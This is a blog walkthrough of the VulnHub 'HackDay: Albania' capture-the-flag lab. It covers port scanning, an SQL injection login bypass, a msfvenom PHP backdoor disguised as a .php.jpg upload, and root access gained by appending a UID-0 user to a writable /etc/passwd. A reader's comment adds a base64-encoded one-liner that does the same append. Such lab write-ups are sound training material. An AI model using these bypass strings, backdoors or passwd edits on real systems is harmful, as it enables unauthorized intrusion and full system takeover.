Monday 5 December 2016

CTF HackDay: Albania - WalkThrough

Hey Readers,
So here i'm up with another CTF i've recently solved. It was kinda tricky (unexpectedly). But after irritating seniors with my problems related to it, i finally managed to solve it all :P .

Download > https://www.vulnhub.com/entry/hackday-albania,167/


So first thing first .. determining the target. I scanned network for live devices. (Our target was with IP "192.168.0.107").

Alright i did some intense scan on our target. Scanned for port range 0-10000. and finally ended up with 2 open ports 8008(apache server) and 22 (SSH). Also i got some directories.

$ sudo nmap -T4 -A -v -p 0-10000 192.168.0.107


Dirs i got :

/rkfpuzrahngvat/
/slgqvasbiohwbu/
/tmhrwbtcjpixcv/
/vojtydvelrkzex/
/wpkuzewfmslafy/
/xqlvafxgntmbgz/
/yrmwbgyhouncha/
/zsnxchzipvodib/
/atoydiajqwpejc/
/bupzejbkrxqfkd/
/cvqafkclsyrgle/
/unisxcudkqjydw/
/dwrbgldmtzshmf/
/exschmenuating/
/fytdinfovbujoh/
/gzuejogpwcvkpi/
/havfkphqxdwlqj/
/ibwglqiryexmrk/
/jcxhmrjszfynsl/
/kdyinsktagzotm/
/lezjotlubhapun/
/mfakpumvcibqvo/
/ngblqvnwdjcrwp/
/ohcmrwoxekdsxq/
/pidnsxpyfletyr/
/qjeotyqzgmfuzs/

I then opened link "192.168.0.107:8008" on which apache was running and got prompted with a message box "Ne qofte se jam UNE, e di se ku te shkoj " > Translated > "If I am, I know where to go".



I started visiting each dir and ended with a meme :/


But there i found a directory named "unisxcudkqjydw" which had a bit differ page asking me to redirect on page "/unisxcudkqjydw/vulnbank/" with message "IS there any /vulnbank/ in there ???". I visited that link and got a login page of some "Vuln Bank".


I tried some random combinations for auth bypass but unfortunately non of em worked, except one

Username : " '
Password : " '

Got prompted with an SQL Error. I thought it was my lucky shot :P and tried sqlmap and various other SQLi tools, but result was negative :/


Finally i downloaded a list for username and password and ran it over hydra. LOL my fate really worked (I dont use hydra and hate BruteForce attacks :/ :P)
I got a working combination

Username : ' or 'a' = 'a' --
Password : #


Okay!! so i was finally seeing some hope to solve it :).

Tried uploading php files directly, but that didn't worked. I immediately generated php backdoor via msfvenom and renamed it with extension ".php.jpg". Opened handler and executed the payload by visiting the link where it was saved to.


Then i just gained the bash shell with command :

$ /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'


I then checked all files and directory carefully if i could find some hint, but everything was useless. I thought config.php would work. I opened it and got user and pass to mysql with root credentials, thought it could be same credentials for root user login too, but result was negative.

After getting literally cooked up :P i checked for writable dirs on machine with command :

$  find / -writable -type f 2>/dev/null

LOL i noticed /etc/passwd was writable :P Bingo !! there i strikes with an idea ... "what if i manually add another user in passwd file ?" (Reference which helped me).

I then generated a hash password using openssl.

Useraname : dope
Passoword : dope


Now i just got back to meterpreter. Opened and edited /etc/passwd with option "edit". Added new user at bottom, and saved the file.

dope:$1$MamNpKxX$/zIJhc75C0O9zRrTxxGYB/:0:0:test:/root:/bin/bash

Edited /etc/passwd just look like :


Here i started having intention for getting escalated to root privilege soon.

And finally, I ran command " su ", entered password for user i just made, And Boom !! It worked :P finally i captured the flag :D

$ su dope  
$ id
$ cd /root && cat flag.txt


Special Thnaks to : VulnHub :) <3
Follow me on twitter : https://twitter.com/Indi_g34r

1 comment:

  1. So I didn't use meterpreter... and I got hung.. I ended up doing this:

    echo "ZG9wZTokMSRNYW1OcEt4WCQveklKaGM3NUMwTzl6UnJUeHhHWUIvOjA6MDp0ZXN0Oi9yb290Oi9iaW4vYmFzaA==" | base64 -d >> /etc/passwd

    ReplyDelete